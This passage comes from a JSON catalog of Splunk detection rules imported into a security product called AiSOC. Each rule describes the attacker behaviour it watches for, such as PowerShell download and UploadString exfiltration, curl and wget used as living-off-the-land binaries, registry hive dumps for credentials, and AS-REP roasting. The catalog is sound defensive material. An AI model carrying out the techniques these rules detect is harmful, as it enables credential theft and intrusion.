to identify instances where Telegram.exe creates files with a Zone.Identifier, indicating a download. This activity is significant as it may indicate an adversary using Telegram to download malicious tools, such as network scanners, for further exploitation. If confirmed malicious, this behavior could lead to network mapping, lateral movement, and potential compromise of additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/download-files-using-telegram.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58194e28-ae5e-11eb-8912-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/download_files_using_telegram.yml" } }, { "id": "splunk-security-content-583c5de3-7709-44cb-abfc-0e828d301b59", "type": "detection", "name": "O365 SharePoint Malware Detection", "description": "The following analytic identifies when a malicious file is detected within the SharePoint Online ecosystem. Attackers may stage and execute malicious files from within the Microsoft Office 365 ecosystem. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. Certain premium Office 365 capabilities further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-malware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "583c5de3-7709-44cb-abfc-0e828d301b59", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_malware_detection.yml" } }, { "id": "splunk-security-content-583e8a68-f2f7-45be-8fc9-bf725f0e22fd", "type": "detection", "name": "Active Directory Privilege Escalation Identified", "description": "The following analytic identifies potential privilege escalation activities within an organization's Active Directory (AD) environment. It detects this activity by correlating multiple analytics from the Active Directory Privilege Escalation analytic story within a specified time frame. This is significant for a SOC as it helps identify coordinated attempts to gain elevated privileges, which could indicate a serious security threat. If confirmed malicious, this activity could allow attackers to gain unauthorized access to sensitive systems and data, leading to potential data breaches and further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-directory-privilege-escalation-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "583e8a68-f2f7-45be-8fc9-bf725f0e22fd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_directory_privilege_escalation_identified.yml" } }, { "id": "splunk-security-content-584f4884-0bf1-11ec-a5ec-acde48001122", "type": "detection", "name": "Get-ForestTrust with PowerShell", "description": "The following analytic detects the execution of the Get-ForestTrust command via PowerShell, commonly used by adversaries to gather domain trust information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Identifying this activity is crucial as it indicates potential reconnaissance efforts to map out domain trusts, which can inform further attacks. If confirmed malicious, this activity could allow attackers to understand domain relationships, aiding in lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-foresttrust-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "584f4884-0bf1-11ec-a5ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_foresttrust_with_powershell.yml" } }, { "id": "splunk-security-content-5890ba10-4e48-4dc0-8a40-3e1ebe75e737", "type": "detection", "name": "Linux Auditd Base64 Decode Files", "description": "The following analytic detects suspicious Base64 decode operations that may indicate malicious activity, such as data exfiltration or execution of encoded commands. Base64 is commonly used to encode data for safe transmission, but attackers may abuse it to conceal malicious payloads. This detection focuses on identifying unusual or unexpected Base64 decoding processes, particularly when associated with critical files or directories. By monitoring these activities, the analytic helps uncover potential threats, enabling security teams to respond promptly and mitigate risks associated with encoded malware or unauthorized data access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-base64-decode-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5890ba10-4e48-4dc0-8a40-3e1ebe75e737", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_base64_decode_files.yml" } }, { "id": "splunk-security-content-58adae9e-8ea3-11ec-90f6-acde48001122", "type": "detection", "name": "Windows Diskshadow Proxy Execution", "description": "The following analytic detects the use of DiskShadow.exe in scripting mode, which can execute arbitrary unsigned code. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions with scripting mode flags. This activity is significant because DiskShadow.exe is typically used for legitimate backup operations, but its misuse can indicate an attempt to execute unauthorized code. If confirmed malicious, this could lead to unauthorized code execution, potentially compromising the system and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-diskshadow-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58adae9e-8ea3-11ec-90f6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_diskshadow_proxy_execution.yml" } }, { "id": "splunk-security-content-58c4e56c-b5b8-46a3-b5fb-6537dca3c6de", "type": "detection", "name": "Windows File Download Via PowerShell", "description": "The following analytic detects the use of PowerShell's download methods such as\n\"DownloadString\" and \"DownloadData\" from the WebClient class or Invoke-WebRequest\nand it's aliases \"IWR\" or \"Curl\".\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on\nprocess execution logs that include command-line details.\nThis activity can be significant such methods and functions are commonly used in malicious\nPowerShell scripts to fetch and execute remote code.\nIf confirmed malicious, this behavior could allow an attacker to download and run\narbitrary code, potentially leading to unauthorized access, data exfiltration,\nor further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-download-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58c4e56c-b5b8-46a3-b5fb-6537dca3c6de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_download_via_powershell.yml" } }, { "id": "splunk-security-content-58cea3ec-1f6d-11ec-8560-acde48001122", "type": "detection", "name": "Screensaver Event Trigger Execution", "description": "The following analytic detects modifications to the SCRNSAVE.EXE registry entry, indicating potential event trigger execution via screensaver settings for persistence or privilege escalation. It leverages registry activity data from the Endpoint data model to identify changes to the specified registry path. This activity is significant as it is a known technique used by APT groups and malware to maintain persistence or escalate privileges. If confirmed malicious, this could allow an attacker to execute arbitrary code with elevated privileges, leading to further system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/screensaver-event-trigger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58cea3ec-1f6d-11ec-8560-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/screensaver_event_trigger_execution.yml" } }, { "id": "splunk-security-content-58d270fb-5b39-418e-a855-4b8ac046805e", "type": "detection", "name": "MacOS LOLbin", "description": "The following analytic detects multiple executions of Living off the Land (LOLbin) binaries on macOS within a short period.\nIt leverages osquery to monitor process events and identifies commands such as \"find\", \"crontab\", \"screencapture\", \"openssl\", \"curl\", \"wget\", \"killall\", and \"funzip\". This activity is significant as LOLbins are often used by attackers to perform malicious actions while evading detection.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-lolbin.yaml", "provenance": { "source": "splunk/security_content", "source_id": "58d270fb-5b39-418e-a855-4b8ac046805e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_lolbin.yml" } }, { "id": "splunk-security-content-58e034de-1f87-4812-9dc3-a4f68c7db930", "type": "detection", "name": "O365 Concurrent Sessions From Different Ips", "description": "The following analytic identifies user sessions in Office 365 accessed from multiple IP addresses, indicating potential adversary-in-the-middle (AiTM) phishing attacks. It detects this activity by analyzing Azure Active Directory logs for 'UserLoggedIn' operations and flags sessions with more than one associated IP address. This behavior is significant as it suggests unauthorized concurrent access, which is uncommon in normal usage. If confirmed malicious, the impact could include data theft, account takeover, and the launching of internal phishing campaigns, posing severe risks to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-concurrent-sessions-from-different-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58e034de-1f87-4812-9dc3-a4f68c7db930", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_concurrent_sessions_from_different_ips.yml" } }, { "id": "splunk-security-content-58eb9f80-896c-42f8-86c6-27ab59026c9c", "type": "detection", "name": "Okta Non-Standard VPN Usage", "description": "Remote Employment Fraud (REF) actors will often use virtual private networks (VPNs) to conceal their true physical location. Threat actors mask their originating IP address and instead appear to be situated in any location where the VPN service has a node.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1572", "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-non-standard-vpn-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58eb9f80-896c-42f8-86c6-27ab59026c9c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/okta_non_standard_vpn_usage.yml" } }, { "id": "splunk-security-content-58fcdeb1-728d-415d-b0d7-3ab18a275ec2", "type": "detection", "name": "Windows Command and Scripting Interpreter Path Traversal Exec", "description": "The following analytic detects path traversal command-line execution, often used in malicious documents to execute code via msdt.exe for defense evasion. It leverages Endpoint Detection and Response (EDR) data, focusing on specific patterns in process paths. This activity is significant as it can indicate an attempt to bypass security controls and execute unauthorized code. If confirmed malicious, this behavior could lead to code execution, privilege escalation, or persistence within the environment, potentially allowing attackers to deploy malware or leverage other living-off-the-land binaries (LOLBins).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-and-scripting-interpreter-path-traversal-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "58fcdeb1-728d-415d-b0d7-3ab18a275ec2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml" } }, { "id": "splunk-security-content-593854c5-2182-49dd-9f31-18ef697445b9", "type": "detection", "name": "Windows Explorer.exe Spawning PowerShell or Cmd", "description": "This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-explorer-exe-spawning-powershell-or-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "593854c5-2182-49dd-9f31-18ef697445b9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_explorer_exe_spawning_powershell_or_cmd.yml" } }, { "id": "splunk-security-content-5984dbe8-572f-47d7-9251-3dff6c3f0c0d", "type": "detection", "name": "Kubernetes Cron Job Creation", "description": "The following analytic detects the creation of a Kubernetes cron job, which is a task scheduled to run automatically at specified intervals. It identifies this activity by monitoring Kubernetes Audit logs for the creation events of cron jobs. This behavior is significant for a SOC as it could allow an attacker to execute malicious tasks repeatedly and automatically, posing a threat to the Kubernetes infrastructure. If confirmed malicious, this activity could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-cron-job-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5984dbe8-572f-47d7-9251-3dff6c3f0c0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_cron_job_creation.yml" } }, { "id": "splunk-security-content-59b0fc85-7a0d-4585-97ec-06a382801990", "type": "detection", "name": "Windows AD Dangerous Group ACL Modification", "description": "This detection monitors the addition of the following ACLs to an Active Directory group object: \"Full control\", \"All extended rights\", \"All validated writes\", \"Create all child objects\", \"Delete all child objects\", \"Delete subtree\", \"Delete\", \"Modify permissions\", \"Modify owner\", and \"Write all properties\". Such modifications can indicate potential privilege escalation or malicious activity. Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-group-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59b0fc85-7a0d-4585-97ec-06a382801990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_group_acl_modification.yml" } }, { "id": "splunk-security-content-59b51620-94c9-11ec-b3d5-acde48001122", "type": "detection", "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "description": "The following analytic detects the use of the `Set-ADAccountControl` PowerShell cmdlet with parameters that disable Kerberos Pre-Authentication. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific command execution. Disabling Kerberos Pre-Authentication is significant because it allows adversaries to perform offline brute force attacks against user passwords using the AS-REP Roasting technique. If confirmed malicious, this activity could enable attackers to escalate privileges or maintain persistence within an Active Directory environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-pre-authentication-flag-disabled-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59b51620-94c9-11ec-b3d5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_pre_authentication_flag_disabled_with_powershell.yml" } }, { "id": "splunk-security-content-59e54602-9680-11ec-a8a6-acde48001122", "type": "detection", "name": "Windows Disable Memory Crash Dump", "description": "The following analytic detects attempts to disable the memory crash dump feature on Windows systems by setting the registry value to 0. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the CrashDumpEnabled registry key. This activity is significant because disabling crash dumps can hinder forensic analysis and incident response efforts. If confirmed malicious, this action could be part of a broader attack strategy, such as data destruction or system destabilization, as seen with HermeticWiper, potentially leading to significant operational disruptions and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-memory-crash-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59e54602-9680-11ec-a8a6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_memory_crash_dump.yml" } }, { "id": "splunk-security-content-59e8bf41-7472-412a-90d3-00f3afa452e9", "type": "detection", "name": "Windows Exfiltration Over C2 Via Powershell UploadString", "description": "The following analytic identifies potential data exfiltration using the PowerShell `net.webclient` command with the `UploadString` method. It leverages PowerShell Script Block Logging to detect instances where this command is executed. This activity is significant as it may indicate an attempt to upload sensitive data, such as desktop screenshots or files, to an external or internal URI, often associated with malware like Winter-Vivern. If confirmed malicious, this could lead to unauthorized data transfer, compromising sensitive information and potentially leading to further exploitation of the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exfiltration-over-c2-via-powershell-uploadstring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "59e8bf41-7472-412a-90d3-00f3afa452e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_exfiltration_over_c2_via_powershell_uploadstring.yml" } }, { "id": "splunk-security-content-5a2ec401-60bb-474e-b936-1e66e7aa4060", "type": "detection", "name": "Azure AD Service Principal Authentication", "description": "The following analytic identifies authentication events of service principals in Azure Active Directory. It leverages the `azure_monitor_aad` data source, specifically targeting \"Sign-in activity\" within ServicePrincipalSignInLogs. This detection gathers details such as sign-in frequency, timing, source IPs, and accessed resources. Monitoring these events is significant for SOC teams to distinguish between normal application authentication and potential anomalies, which could indicate compromised credentials or malicious activities. If confirmed malicious, attackers could gain unauthorized access to resources, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a2ec401-60bb-474e-b936-1e66e7aa4060", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_authentication.yml" } }, { "id": "splunk-security-content-5a5351cd-ba7e-499e-ad82-2ce160ffa637", "type": "detection", "name": "Windows Privilege Escalation System Process Without System Parent", "description": "The following analytic detects any system integrity level process spawned by a non-system account. It leverages Sysmon EventID 1, focusing on process integrity and parent user data. This behavior is significant as it often indicates successful privilege escalation to SYSTEM from a user-controlled process or service. If confirmed malicious, this activity could allow an attacker to gain full control over the system, execute arbitrary code, and potentially compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-system-process-without-system-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a5351cd-ba7e-499e-ad82-2ce160ffa637", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml" } }, { "id": "splunk-security-content-5a773226-ebd7-480c-a819-fccacfeddcd9", "type": "detection", "name": "GitHub Enterprise Disable 2FA Requirement", "description": "The following analytic detects when two-factor authentication (2FA) requirements are disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for 2FA requirement changes by tracking actor details, organization information, and associated metadata. For a SOC, identifying disabled 2FA requirements is critical as it could indicate attempts to weaken account security controls. Two-factor authentication is a fundamental security control that helps prevent unauthorized access even if passwords are compromised. Disabling 2FA requirements could allow attackers to more easily compromise accounts through password-based attacks. The impact of disabled 2FA includes increased risk of account takeover, potential access to sensitive code and intellectual property, and compromise of the software supply chain. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting broader account compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-2fa-requirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a773226-ebd7-480c-a819-fccacfeddcd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_2fa_requirement.yml" } }, { "id": "splunk-security-content-5a83ce44-8e0f-4786-a775-8249a525c879", "type": "detection", "name": "Windows Unsigned DLL Side-Loading", "description": "The following analytic detects the creation of potentially malicious unsigned DLLs in the c:\\windows\\system32 or c:\\windows\\syswow64 folders. It leverages Sysmon EventCode 7 logs to identify unsigned DLLs with unavailable signatures loaded in these critical directories. This activity is significant as it may indicate a DLL hijacking attempt, a technique used by attackers to gain unauthorized access and execute malicious code. If confirmed malicious, this could lead to privilege escalation, allowing the attacker to gain elevated privileges and further compromise the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a83ce44-8e0f-4786-a775-8249a525c879", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_dll_side_loading.yml" } }, { "id": "splunk-security-content-5a8a2a72-8322-11eb-9ee9-acde48001122", "type": "detection", "name": "Clop Common Exec Parameter", "description": "The following analytic identifies the execution of CLOP ransomware variants using specific arguments (\"runrun\" or \"temp.dat\") to trigger their malicious activities. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it indicates potential ransomware behavior, which can lead to file encryption on network shares or local machines. If confirmed malicious, this activity could result in significant data loss and operational disruption due to encrypted files, highlighting the need for immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clop-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5a8a2a72-8322-11eb-9ee9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clop_common_exec_parameter.yml" } }, { "id": "splunk-security-content-5aaff29d-0cce-405b-9ee8-5d06b49d045e", "type": "detection", "name": "Windows Sensitive Registry Hive Dump Via CommandLine", "description": "The following analytic detects the use of `reg.exe` to export Windows Registry hives, which may contain sensitive credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving `save` or `export` actions targeting the `sam`, `system`, or `security` hives. This activity is significant as it indicates potential offline credential access attacks, often executed from untrusted processes or scripts. If confirmed malicious, attackers could gain access to credential data, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sensitive-registry-hive-dump-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5aaff29d-0cce-405b-9ee8-5d06b49d045e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sensitive_registry_hive_dump_via_commandline.yml" } }, { "id": "splunk-security-content-5aba1860-9617-4af9-b19d-aecac16fe4f2", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen Region", "description": "The following analytic detects cloud provisioning activities originating from previously unseen regions. It leverages cloud infrastructure logs to identify events where resources are started or created, and cross-references these with a baseline of known regions. This activity is significant as it may indicate unauthorized access or misuse of cloud resources from unfamiliar locations. If confirmed malicious, this could lead to unauthorized resource creation, potential data exfiltration, or further compromise of cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, 